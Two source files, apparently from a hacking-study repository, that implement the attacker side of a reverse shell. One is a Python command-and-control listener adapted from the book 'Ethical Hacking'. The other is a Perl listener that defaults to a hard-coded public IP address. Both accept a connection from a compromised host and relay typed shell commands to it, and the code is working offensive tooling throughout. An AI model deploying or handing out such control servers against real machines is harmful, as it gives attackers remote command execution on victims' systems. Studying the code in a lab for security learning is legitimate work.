File: reverseShell_python/reverseShellServer.py
#!/usr/bin/env python3
# Scripted to run on python3

"""
Description: CNC server (command and control)
Reverse Shell script (server) as laid out in the book "Ethical Hacking". Made some adjustments of my own as well.
"""
import sys
from socket import *
serverPort = sys.argv[2] if len(sys.argv) > 2 else 8000 # Use port 8000 by default

# Create client IPv4 (AF_INET) TCPSocket (SOCK_STREAM)
# Using IPv4 TCP Socket to match client socket
serverSocket = socket(AF_INET, SOCK_STREAM)

# Reuse previously-used socket if one exists
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)

# Binding the port - leaving IP blank so it uses default on host machine
serverSocket.bind(('', serverPort))

# Listen for incoming connections
serverSocket.listen(1)

print("Attacker box listening and awaiting instructions")

# Create/Return socket obj after socket conn
connectionSocket, addr = serverSocket.accept()
print("Connected to {}!".format(str(addr)))

# Get/print message
message = connectionSocket.recv(1024)
print("Message received: {}".format(str(message)))

command = ""

while command != "exit":
    command = input("Enter a command: ")
    connectionSocket.send(command.encode())
    message = connectionSocket.recv(1024).decode()
    print(message)

connectionSocket.shutdown(SHUT_RDWR)
connectionSocket.close()

File: ReverseShell_perl_testing/reverseShellServer.pl
#!/usr/bin/perl -w


use strict;
use Socket;

# Use public IP unless otherwise specified
my $server = $ARGV[0] || "96.126.97.119";  # Host IP running the server

# use port 7890 as default
my $port = $ARGV[1] || 7890;
my $proto = getprotobyname('tcp');

# create a socket, make it reusable
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "Can't open socket $!\n";
setsockopt(SOCKET, SOL_SOCKET, SO_REUSEADDR, 1) or die "Can't set socket option to SO_REUSEADDR $!\n";

# bind to a port, then listen
bind( SOCKET, pack_sockaddr_in($port, inet_aton($server))) or die "Can't bind to port $port! \n";

listen(SOCKET, 5) or die "listen: $!";
print "SERVER started on port $port - awaiting connections...\n";

# accepting a connection
my $client_addr;
my $connected = 0;
my $response;

while ($client_addr = accept(NEW_SOCKET, SOCKET)) {

    print "[Connected] Enter a command: " if $connected == 0;

    while( my $line = <STDIN> ) {

        # do some stuff with $line
        print "[Connected] Enter a command: "  ;
        print NEW_SOCKET "$line";
        close NEW_SOCKET;
        $connected = 1;
        last;

    }

}
